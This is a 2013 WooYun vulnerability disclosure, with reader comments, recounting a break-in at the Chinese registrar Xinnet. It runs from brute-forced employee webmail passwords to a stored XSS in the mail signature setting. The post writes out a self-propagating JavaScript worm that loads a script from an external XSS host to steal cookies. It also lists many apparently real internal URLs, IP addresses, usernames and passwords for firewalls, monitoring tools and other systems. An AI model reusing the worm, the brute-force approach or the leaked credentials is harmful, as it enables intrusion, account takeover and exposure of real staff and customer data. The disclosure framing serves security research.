当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036551

漏洞标题:从一个司机的邮箱开始测试新网(Zabbix、cacti、Zenoss、BSS、防火墙、VPN等N多系统沦陷)

相关厂商:新网华通信息技术有限公司

漏洞作者: 贱心

提交时间:2013-09-09 14:33

修复时间:2013-09-14 14:34

公开时间:2013-09-14 14:34

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-09: 细节已通知厂商并且等待厂商处理中
2013-09-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一直觉得企业的邮箱系统是企业安全环节中一个很脆弱的点,哪怕是互联网公司也同样如此。
Zabbix、cacti、Zenoss、BSS、防火墙、VPN、mrtg监控、网站投诉监查系统、WEARE系统、MRTG服务器、多个机房的跳板机、数码庄园ABC座设备账号密码等等 可导致部分用户vps、域名、邮局等账号密码泄露 至于财务信息 比较敏感 这里就不说了

详细说明:

首先我通过百度、谷歌、大数据库等方式收集了一些新网的邮箱地址,从找到的一些新网的员工姓名又生成了一些邮箱地址
我把这些可能的新网邮箱的用户名整理出来,对其进行了爆破。

http://webmail.xinnet.com


不得不说,很幸运,我爆破得到了一个新网司机的邮箱帐号和密码。

liubing@xinnet.com   123456


可能有的同学觉得一个司机的邮箱能有什么用,里面不会有什么重要的东西的
里面确实没什么重要的邮件 ps:新网司机的工资挺低的
但我们找到了这个

QQ截图20130909115325.jpg


好吧 这可比我辛辛苦苦收集的多了好几倍
把800多个邮箱拿到burp上再爆破一次
额~ 吓我一跳啊 800多个邮箱竟然有近百个是弱口令 员工们这安全意识大大的有待提高啊

QQ截图20130909141126.jpg


这里就帮这些同学打码了 免的挨骂 不过如果你是弱口令 记得改密码哦
在近百个邮箱里找到了几个技术人员的邮箱,只找到了个zabbix,看来这几个是底层的员工
可是就这么爆破点儿邮箱,找了个zabbix就提交上来多丢人啊
我们的目标是运维的同学 他们掌握这大量系统的权限
OK 我们继续
仔细看了下新网的邮箱系统 发现应该可以直接写html

QQ截图20130909120417.jpg


貌似还有签名,good 我们可以把签名里写上xss代码,这样他下次写邮件给其他同事 他的同事也会中招
等等 我们看下修改签名 发现无token等验证 而且get请求也可以 那我们岂不是可以构造个蠕虫了?!

http://webmail.xinnet.com/app/mailset/mailSign/operate?method=addMailSignature&sigId=&isHtml=false&sigSubject=%E9%BB%98%E8%AE%A4%E7%AD%BE%E5%90%8D&defaultSig=true&signatureContent=签名内容


先试试可不可以xss吧 我把他的默认签名修改为

<script src=http://xssplatform.xss.com/xss?1378700262></script>


我们发一封测试邮件试试

QQ截图20130909121853.jpg


你妹啊,这是什么情况?怎么收到的是一个ip的cookie?
难道读邮件的时候是在这个ip上读?那我们岂不是无法获取到webmail.xinnet.com域上的cookie么(看来新网的技术人员是考虑到xss的)
失败了 难道就这样结束了么?
好吧 把人家签名改回去 走人吧
可天无绝人之路 就在再次打开邮件签名设置的时候 我收到了一条cookie

location : http://webmail.xinnet.com/app/mailset/mailSign/set


可以确认这里有个xss 那就好办了
我们来写个超简单的蠕虫吧

if(localStorage.getItem('a')!='1'){
s=document.createElement("iframe");s.style.display="none";s.src="http://webmail.xinnet.com/app/mailset/mailSign/operate?method=addMailSignature&sigId=&isHtml=false&sigSubject=%E9%BB%98%E8%AE%A4%E7%AD%BE%E5%90%8D&defaultSig=true&signatureContent=%3cscript%20src%3dhttp:%2f%2fxssplatform.xss.com%2fxss%3f1378195725%3e%3c%2fscript%3e";document.body.appendChild(s);
localStorage.setItem('a','1');
}
b=document.createElement("iframe");b.style.display="none";b.src="http://webmail.xinnet.com/app/mailset/mailSign/set";document.body.appendChild(b);


QQ截图20130909123219.jpg


上图是收获的cookie
那这有什么用呢?看看下面我们在邮箱内容里找到的收获吧

mrtg监控流量:http://123.100.0.40 gzidc/gzidc
url:http://58.30.217.121/index.php?reconnect=1
用户名:zabbix监控
密码:xinnet123
http://114.112.53.50/cacti
用户名:cactimonitor
密码:  xinnet123
http://121.14..187/complaintCenter/
http://121.14.4.178/complaintCenter/
http://121.14.4.229/ComplaintCenter/portal/jsp/login/login.jsp
http://121.14.4.228/ComplaintCenter/portal/jsp/login/login.jsp
账号:zbliuhui@xinnet.com
密码:1
防火墙地址:
http://114.112.53.45:28099/
用户名:xinnet
密码:xinnet123!@#
http://61.155.153.248:28099
用户名:xinnet
密码:xinnet123!@#
http://58.30.238.114:28099
用户名:xinnet
密码:xinnet123!@#
http://monitor.300.cn:8080/zport/dmd/Events/evconsole
U:  viewer
P:   viewer#.)
http://fuwu.myxinnet.com/
王斌47
赫英惠
霍森
赵越
闫均
123465
http://yy.myxinnet.com/DisposeSearch.aspx?InspectId=X121031173
test
123456
李荣
123456
登录weare.xinnet.com,用户名:gd-shiyongqi,密码:gd-shiyongqi


还有好多系统 就不全列出来了
如果是真正的骇客 还会对其他地方下手 可想而知会有什么危害。
蠕虫已关闭不会继续传播和获取cookie 不过还是要清掉签名里xss代码

漏洞证明:

QQ截图20130909132120.jpg

QQ截图20130909134331.jpg

QQ截图20130909135301.jpg

QQ截图20130909135536.jpg

QQ截图20130909135915.jpg

QQ截图20130909140105.jpg

QQ截图20130909140140.jpg

QQ截图20130909140609.jpg

QQ截图20130909140905.jpg


QQ截图20130909113033.jpg

QQ截图20130909141632.jpg


QQ截图20130909141831.jpg


QQ截图20130909142212.jpg


QQ截图20130909142034.jpg


还有好多系统 就不全列出来了

修复方案:

也许新网运维们看到这个会痛恨我
但总比有一天真的遇到骇客了 遭受损失才加强安全好得多
司机是无辜的 只是躺枪 弱口令的邮箱太多了

版权声明:转载请注明来源 贱心@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-14 14:34

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-09 14:35 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    从扫地大妈到服务器权限

  2. 2013-09-09 14:40 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    这个碉堡了啊

  3. 2013-09-09 14:45 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    司机只是一个新网很普通的一个司机,司机只是躺枪

  4. 2013-09-09 14:46 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    从一个司机的邮箱开始测试新网,把我吓屎了

  5. 2013-09-09 14:50 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @贱心 感觉司机是无辜的

  6. 2013-09-09 14:59 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    洞猪ID亮了 太亮了 都亮瞎我了。

  7. 2013-09-09 15:02 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    @Black Angel 签名更帅 【贱有锋而形不露,以心为贱,是为藏贱。】

  8. 2013-09-09 15:52 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    人若无名,便可专心练贱

  9. 2013-09-09 16:02 | dyun ( 普通白帽子 | Rank:102 漏洞数:15 | [code][/code])

    练了一手好贱...

  10. 2013-09-09 16:09 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    一贱穿心

  11. 2013-09-09 16:10 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    扫地大妈你也拿下了?

  12. 2013-09-09 17:22 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    扫地大妈一双丝袜引发的血案 --

  13. 2013-09-09 17:33 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    看门大爷的一枚烟头引发的血案~~

  14. 2013-09-09 18:23 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    希望新网能提高安全意识,而不是恨我

  15. 2013-09-09 18:47 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    买菜的王大妈一斤白菜引发的血案~

  16. 2013-09-09 19:49 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    乌云剑心家的一只疯狗引发的血案~

  17. 2013-09-09 20:15 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    太血腥了

  18. 2013-09-09 20:41 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    @贱心 想不恨你是不可能的.

  19. 2013-09-09 20:50 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    公司司机的菊花引发的血案 --

  20. 2013-09-09 21:02 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    我擦 司机都能搞出这么大的名堂

  21. 2013-09-09 21:37 | 乱人心xsser ( 路人 | Rank:3 漏洞数:1 | 渗透师|结界师|跨站师|安全工程师|系统工程...)

    亮了

  22. 2013-09-10 10:09 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    @Skull 那他们安全无希望了

  23. 2013-09-10 10:10 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    @点点 司机当然没那么大权限 只不过是入口点

  24. 2013-09-10 10:18 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    @贱心 = =不带这么的.

  25. 2013-09-10 10:22 |   ( 路人 | Rank:10 漏洞数:4 |  )

    说好的,扫地大妈呢?

  26. 2013-09-10 10:22 |   ( 路人 | Rank:10 漏洞数:4 |  )

    说好的,扫地大妈呢?

  27. 2013-09-10 19:47 | 西瓜 ( 路人 | Rank:6 漏洞数:1 | 喜爱渗透,硬件!!、、、、、、)

    这个不错

  28. 2013-09-10 20:42 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    感觉忽略的节奏...

  29. 2013-09-10 23:31 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    NB的节奏.

  30. 2013-09-12 18:21 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    最新消息,新网已经得到乌云的邮件通知,内部已经发通知要求员工修改密码了,禁止使用弱口令了,其他问题不知道新网打算怎么修补。 ----坐看新网是否忽略!

  31. 2013-09-12 18:23 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @贱心 你懂的,忽略的节奏!

  32. 2013-09-13 08:56 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    @贱心 和新网合作了一年 公司两个邮箱,可把我害惨了。 他们那边技术烂的无语,联通线路故障,他们三天后才确认回复。技术客服什么都不懂。找技术,说技术不接电话,找他们部门经理,说经理没电话。可把我气死了,你替我出气了。

  33. 2013-09-13 08:57 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    @贱心 误导。。。不是新网数码啊

  34. 2013-09-13 10:13 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    @Leon 是新网数码 公司也叫新网华通信息技术有限公司

  35. 2013-09-13 12:21 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    @贱心 OO爽00

  36. 2013-09-14 15:25 | ╰╃清風 ( 实习白帽子 | Rank:89 漏洞数:9 | 这家伙很懒,什么都没有留下)

    @贱心 看完了已发邮件后,其实我对王琳娜感兴趣,最后她和司机有没有在一起呢

  37. 2013-09-14 15:28 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    忽略咯 -

  38. 2013-09-14 16:20 | insight-labs 认证白帽子 ( 普通白帽子 | Rank:623 漏洞数:75 | Security guys)

    密码没一个改的……目测要万人骑了

  39. 2013-09-14 17:02 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    哎....

  40. 2013-09-14 18:03 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    不注重安全,早晚会出事

  41. 2013-09-14 18:13 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)

    新网的安全真是堪忧,密码到现在也没改!!!

  42. 2013-09-14 22:59 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @xsser 这样直接忽略,早晚会出事的。

  43. 2013-09-14 23:59 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    忽略得威武霸气

  44. 2013-09-15 00:06 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @zeracker 洞主说厂商内部已经知道了 不知道为何不处理 估计已经放弃治疗了

  45. 2013-09-15 02:19 | 小薇2013 ( 实习白帽子 | Rank:32 漏洞数:5 | 我就看看我不说话!)

    牛啊~都不改~

  46. 2013-09-15 11:44 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去,悲剧。搞掉他吧。肯定是放弃治疗了

  47. 2013-09-15 17:55 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    @zeracker @wefgod @Finger 感觉是运维或者哪个部门对上级领导隐瞒了这个事儿 有信息表明他们曾经因为乌云报告的安全问题挨批评(从报告的那些安全问题来看,有些人也确实应该挨批评!)

  48. 2013-09-16 09:00 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @贱心 让他挂掉吧

  49. 2013-09-17 21:27 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    司机工资果然不高

  50. 2013-09-18 00:57 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    忽略得威武霸气赏技术员一丈红吧

  51. 2013-09-18 01:17 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    还有一堆123456,那个工资的excel要6位数字密码有啥意思呢, 加密算法又老,口令又短,几秒钟的事。

  52. 2013-09-18 08:54 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    http://114.112.53.45:28099/ 被改了。。

  53. 2013-09-19 09:36 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    这是跟新网多大仇啊。。

  54. 2013-10-24 13:58 | 牛牛 ( 路人 | Rank:0 漏洞数:1 | 一个对网络安全充满激情的小白)

    真坑人啊 这都能忽略掉

  55. 2013-10-30 10:21 | 昵称 ( 路人 | 还没有发布任何漏洞 | 简单介绍)

    还有没改的,尼玛

  56. 2013-11-05 23:59 | 习惯一个人 ( 实习白帽子 | Rank:31 漏洞数:6 | 动荡年代,我只图个安宁…)

    哇嘎嘎,攒一个。

  57. 2013-11-15 11:13 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    赞啊

  58. 2013-11-15 11:16 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    怒赞···

  59. 2014-05-07 08:40 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    学习了!

  60. 2014-05-07 10:21 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    这个要打雷

  61. 2014-05-21 21:22 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @贱心 因为你我丢了这份工作,你要拿什么域名赔偿我。

  62. 2014-05-22 02:36 | 小夜 ( 路人 | Rank:15 漏洞数:8 | 漫长的日子)

    学习了 谢谢

  63. 2014-05-23 10:53 | ddy ( 实习白帽子 | Rank:44 漏洞数:16 | 其实第一次要我挖洞我是拒绝的。因为,你不...)

    厂商回应:危害等级:无影响厂商忽略忽略时间:2013-09-09 14:33

  64. 2014-08-05 15:44 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    厂商忽略。。。略屌!